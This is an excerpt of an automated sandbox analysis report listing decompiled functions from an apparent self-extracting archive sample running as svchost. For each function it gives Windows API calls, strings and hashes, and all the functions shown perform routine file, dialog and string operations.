                                                            • Opcode ID: ad695d57d08ab17b9daf791faa03fa91b289000f0fc6ccd84f50517b16ac0c63
                                                            • Instruction ID: dbcf688f26552d6f5f758b78cdd08389d7ecefb0681aea27115612a71f1ebc0d
                                                            • Opcode Fuzzy Hash: ad695d57d08ab17b9daf791faa03fa91b289000f0fc6ccd84f50517b16ac0c63
                                                            • Instruction Fuzzy Hash: 251191B1A0070DAFC3215F6A9C849A7FBECFB65744F104C2EF2DAC2201D6B5A9518B50
                                                            Function 0084B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084B2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0084B2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 0084B304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1
                                                            • API String ID: 445417207-3292211884
                                                            • Opcode ID: aee5f56552565e30364ee7a9c09c06a244f86f106d33762d22884dafaf6eb5d7
                                                            • Instruction ID: 0fcbb5c1b8f4c8be20addb771163e980a8d8b04c8fae5bd662504260cf468442
                                                            • Opcode Fuzzy Hash: aee5f56552565e30364ee7a9c09c06a244f86f106d33762d22884dafaf6eb5d7
                                                            • Instruction Fuzzy Hash: E111E13290012CB6DB22AEA89C49FFF37BCFB59700F000021FA45F3184D7A4DA0597A1
                                                            Function 0084DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: d2487808a3054bc6e5a97066941a43367fae89a527069c43a0f9f22b37cb8f33
                                                            • Instruction ID: 1c40b5721601abbeb762697f99f359ff95433d6da6f6dd972e98ed6228889a97
                                                            • Opcode Fuzzy Hash: d2487808a3054bc6e5a97066941a43367fae89a527069c43a0f9f22b37cb8f33
                                                            • Instruction Fuzzy Hash: 6F017C76A0435DEFDB619FA8FC4CA5A7BA9F709358B040426F909D3234D671D890DBA0
                                                            Function 0084DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0084DBF4
                                                            • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0084DC30
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID: sfxcmd$sfxpar
                                                            • API String ID: 1431749950-3493335439
                                                            • Opcode ID: e2b7d9867f3e983d6eb235dde4642a543f0bcfaa031fb42c4b877055fb4a64a4
                                                            • Instruction ID: 4c0ffa3fded4e7ddcd2434ac519c38c64356103f08130edd84ed2016bca80c84
                                                            • Opcode Fuzzy Hash: e2b7d9867f3e983d6eb235dde4642a543f0bcfaa031fb42c4b877055fb4a64a4
                                                            • Instruction Fuzzy Hash: 86F0A0B240432CAACB212F988C46FAB7B98FF16B85B050411FE85D6251E6F48940DAA1
                                                            Function 00859A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                            • Instruction ID: 765cd662a1a0d4b720e2204baf00407958d8e887cdb8569d597df667a1a3fc3a
                                                            • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                            • Instruction Fuzzy Hash: B7A1137290469ADFEB228F28C8917AEBBE5FF51311F1841ADE8C5DB281C6388D49C751
                                                            Function 0083A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00837F69,?,?,?), ref: 0083A3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00837F69,?), ref: 0083A43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00837F69,?,?,?,?,?,?,?), ref: 0083A4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,00837F69,?,?,?,?,?,?,?,?,?,?), ref: 0083A4C6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 80249dc564e5f1c4320ac6030d20c0118e20dcfca349133f8e48400857c0f57d
                                                            • Instruction ID: e6b928f44582f0f3545b5d05a728a87419e3fc9572a021e16943ac2f88b1a7de
                                                            • Opcode Fuzzy Hash: 80249dc564e5f1c4320ac6030d20c0118e20dcfca349133f8e48400857c0f57d
                                                            • Instruction Fuzzy Hash: 7941AE31248381AAD725DF28DC49FAEBBE8FBC5700F04091DF5D5D3290D6A49A489B93
                                                            Function 00831100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: c678881c18fb8b88451c3bd928a63508d82c09aa4464a0e381e705552586268a
                                                            • Instruction ID: 1a2686e6d266fa0a70172e4c76e0cb0a54b31cec308f8bbd4f559b8ed98b130f
                                                            • Opcode Fuzzy Hash: c678881c18fb8b88451c3bd928a63508d82c09aa4464a0e381e705552586268a
                                                            • Instruction Fuzzy Hash: 1B41B4719006695BCB11EF688C4A9EF7BB8FF40751F04001AFD46E7245EF30AE498AE1
                                                            Function 0085C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,008591E0,?,00000000,?,00000001,?,?,00000001,008591E0,?), ref: 0085C9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085CA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00856CBE,?), ref: 0085CA70
                                                            • __freea.LIBCMT ref: 0085CA79
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: f278501887b94b1a579cac15796f1fe070a032aa9681ddbd5b53625845fa2a26
                                                            • Instruction ID: f171344bcc2503068d92a832d4503b61fb5a8b92e23559ca8305b5aca6e4867d
                                                            • Opcode Fuzzy Hash: f278501887b94b1a579cac15796f1fe070a032aa9681ddbd5b53625845fa2a26
                                                            • Instruction Fuzzy Hash: 5831E172A0021AAFDF26CF68CC41DAE7BA5FB01311B054228FC04E7251EB35DD58CB91
                                                            Function 0084A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0084A666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0084A675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0084A683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0084A691
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 052329a18defa9782dc4b76e2881ccb259b602fe3ea1ab10b29c10fda90f906d
                                                            • Instruction ID: 9de4e000d7a16c6d18fbfc76e197220fd59b0736f944d587c64e330d1f85512b
                                                            • Opcode Fuzzy Hash: 052329a18defa9782dc4b76e2881ccb259b602fe3ea1ab10b29c10fda90f906d
                                                            • Instruction Fuzzy Hash: 3BE01D31982F21F7D3516B607C0DB8B3E54FB15B52F050112F609A51D4DB74C5408BD5
                                                            Function 0084A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0084A699: GetDC.USER32(00000000), ref: 0084A69D
                                                              • Part of subcall function 0084A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0084A6A8
                                                              • Part of subcall function 0084A699: ReleaseDC.USER32(00000000,00000000), ref: 0084A6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0084A83C
                                                              • Part of subcall function 0084AAC9: GetDC.USER32(00000000), ref: 0084AAD2
                                                              • Part of subcall function 0084AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0084AB01
                                                              • Part of subcall function 0084AAC9: ReleaseDC.USER32(00000000,?), ref: 0084AB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 2438004a909be2f5f60be7942f4691265516dd8f43096c10645e17fc998ce395
                                                            • Instruction ID: 6d5044c3765ba300b3352ba368c196cbbba07792071ad803d62b380d0eeba06c
                                                            • Opcode Fuzzy Hash: 2438004a909be2f5f60be7942f4691265516dd8f43096c10645e17fc998ce395
                                                            • Instruction Fuzzy Hash: C891F071208359AFD624DF25C848A2BBBF9FFC8701F00491EF59AD7220DB70A905CB62
                                                            Function 0085B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0085B324
                                                              • Part of subcall function 00859097: IsProcessorFeaturePresent.KERNEL32(00000017,00859086,00000050,00863A34,?,0083D710,00000004,00871030,?,?,00859093,00000000,00000000,00000000,00000000,00000000), ref: 00859099
                                                              • Part of subcall function 00859097: GetCurrentProcess.KERNEL32(C0000417,00863A34,00000050,00871030), ref: 008590BB
                                                              • Part of subcall function 00859097: TerminateProcess.KERNEL32(00000000), ref: 008590C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                            • Instruction ID: ac0cb9dc57848a04b3ef41d92298aba9f3ac953aac110b675bdc2930916c8204
                                                            • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                                            • Instruction Fuzzy Hash: 2B518F71E0020AEFDF14DFA8C881AADBBF5FF68315F248169E854E7341E7359A098B50
                                                            Function 008375DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 008375E3
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                              • Part of subcall function 0083A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0083777F
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A501
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 213411966f5151ad567054d4e47e3e09e859620ef99c19aae2f52228ee05053d
                                                            • Instruction ID: dc307c3ff0cc25a2374ae4a3fc33cc6ee87e7b29b60d543525ea7bd6840f75e8
                                                            • Opcode Fuzzy Hash: 213411966f5151ad567054d4e47e3e09e859620ef99c19aae2f52228ee05053d
                                                            • Instruction Fuzzy Hash: A84156B1801558A9EB35EB58CC56EDEB77CFF95300F004096B645E2092DB749F85CFA1
                                                            Function 0084B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: c8595a49a435d4f4947896573c214e0290b07a9daf59171bd368eb32abb874c8
                                                            • Instruction ID: c6ec6a40a2a8b8e7da7a0f6ed7826022251560691fdaf39949bab170559484af
                                                            • Opcode Fuzzy Hash: c8595a49a435d4f4947896573c214e0290b07a9daf59171bd368eb32abb874c8
                                                            • Instruction Fuzzy Hash: 0121AE7290431E5AD731EAA8D845E6AF3ECFFA1751F05042AFA40C3241EB65DD4883A3
                                                            Function 0083F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0083F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0083F2E4
                                                              • Part of subcall function 0083F2C5: GetProcAddress.KERNEL32(008781C8,CryptUnprotectMemory), ref: 0083F2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,0083F33E), ref: 0083F3D2
                                                            Strings
                                                            • CryptUnprotectMemory failed, xrefs: 0083F3CA
                                                            • CryptProtectMemory failed, xrefs: 0083F389
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 779556a0f2c07cf1c6c29c809560572240c78fa1c4ea181c67c85b1fda8b306f
                                                            • Instruction ID: 48601966a744d0d1520d65dc10ee0ecee85225f2c2c04d0aa0521fa3d74fca82
                                                            • Opcode Fuzzy Hash: 779556a0f2c07cf1c6c29c809560572240c78fa1c4ea181c67c85b1fda8b306f
                                                            • Instruction Fuzzy Hash: BA112631E04629ABDF119F28DC49A6E3B54FF80760F118126FE05DB352DB75DD418AE1
                                                            Function 0083B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0083B9B8
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 5bf6a4863579f249b889eeae0ece4940146a124761e9d2d194f0bbc56995ef01
                                                            • Instruction ID: 9985dc98b768390d603b3397974fb4aa730bde12b3dd7d7bb2dd9ab3fa232952
                                                            • Opcode Fuzzy Hash: 5bf6a4863579f249b889eeae0ece4940146a124761e9d2d194f0bbc56995ef01
                                                            • Instruction Fuzzy Hash: 9301F9A35047117596706B798C42D6BBB9CFFD2771F40480AFA44D7082FB24D85482F2
                                                            Function 0084101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNEL32(00000000,00010000,00841160,?,00000000,00000000), ref: 00841043
                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 0084108A
                                                              • Part of subcall function 00836C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00836C54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
